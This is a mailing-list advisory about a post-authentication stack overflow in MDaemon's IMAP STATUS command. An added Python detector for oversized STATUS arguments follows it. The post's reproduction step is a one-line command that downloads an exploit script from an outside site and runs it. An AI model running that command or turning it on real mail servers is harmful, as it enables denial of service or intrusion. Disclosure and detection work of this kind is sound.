Let it be known that this bug is after authentication ("postauth") and
therefore useless.
In the current version of Mdaemon from ALTN there exists an easy to
exploit, run-of-the-mill stack overflow.
By authenticating and sending a large argument to the STATUS command in
the IMAP component, a buffer will be overflowed, and an access violation
will be caused.
To reproduce:
cd SMUDGE; wget http://felinemenace.org/~nd/SMUDGE/Mdaemon/Mdaemon7.0.1Stack.py; python Mdaemon7.0.0.1Stack.py
Change the user and password first.
Thanks to:
- Dave Aitel for his neat spike scripts which convert to SMUDGE scripts
quite easily :)
- rootkit.com
Not sure if the vendor knows about it.
Thanks,
nd
ps: second public release from the UBC, we have to make space for the new
vulns :)
--
http://felinemenace.org/~nd
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
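
Added example, not part of the original post or of any vendor code: a detection sketch for the condition described above, an oversized argument to the IMAP STATUS command. It measures the mailbox argument in each client command line, whether sent as an atom, a quoted string or a literal announcement ({n}), and flags those over a limit. The 255-byte limit, the function names and the sample lines are assumptions constructed for illustration.

```python
import re

MAX_MAILBOX_LEN = 255  # assumed policy limit, not a value from the advisory

# tag SP "STATUS" SP mailbox; the mailbox is a quoted string,
# a literal announcement such as {9000}, or a bare atom.
_STATUS_RE = re.compile(
    rb'^(?P<tag>\S+) STATUS (?:"(?P<quoted>(?:[^"\\]|\\.)*)"'
    rb'|\{(?P<literal>\d+)\+?\}|(?P<atom>[^\s(]+))',
    re.IGNORECASE,
)

def status_mailbox_length(line: bytes):
    """Return the mailbox-argument length of a STATUS command, or None if not STATUS."""
    m = _STATUS_RE.match(line.rstrip(b"\r\n"))
    if m is None:
        return None
    if m.group("literal") is not None:
        # The client announces how many bytes follow on the next line.
        return int(m.group("literal"))
    if m.group("quoted") is not None:
        return len(m.group("quoted"))
    return len(m.group("atom"))

def flag_oversized_status(lines, limit=MAX_MAILBOX_LEN):
    """Return (line_number, tag, length) for each STATUS command over the limit."""
    hits = []
    for n, line in enumerate(lines, 1):
        length = status_mailbox_length(line)
        if length is not None and length > limit:
            tag = line.split(b" ", 1)[0].decode("ascii", "replace")
            hits.append((n, tag, length))
    return hits

# Constructed sample of client-to-server IMAP lines (not captured traffic).
SAMPLE = [
    b"a1 LOGIN user pass\r\n",
    b"a2 STATUS INBOX (MESSAGES UNSEEN)\r\n",
    b'a3 STATUS "' + b"A" * 4000 + b'" (MESSAGES)\r\n',
    b"a4 status {9000}\r\n",
    b"a5 SELECT INBOX\r\n",
]

if __name__ == "__main__":
    for hit in flag_oversized_status(SAMPLE):
        print("oversized STATUS argument: line %d tag %s length %d" % hit)
```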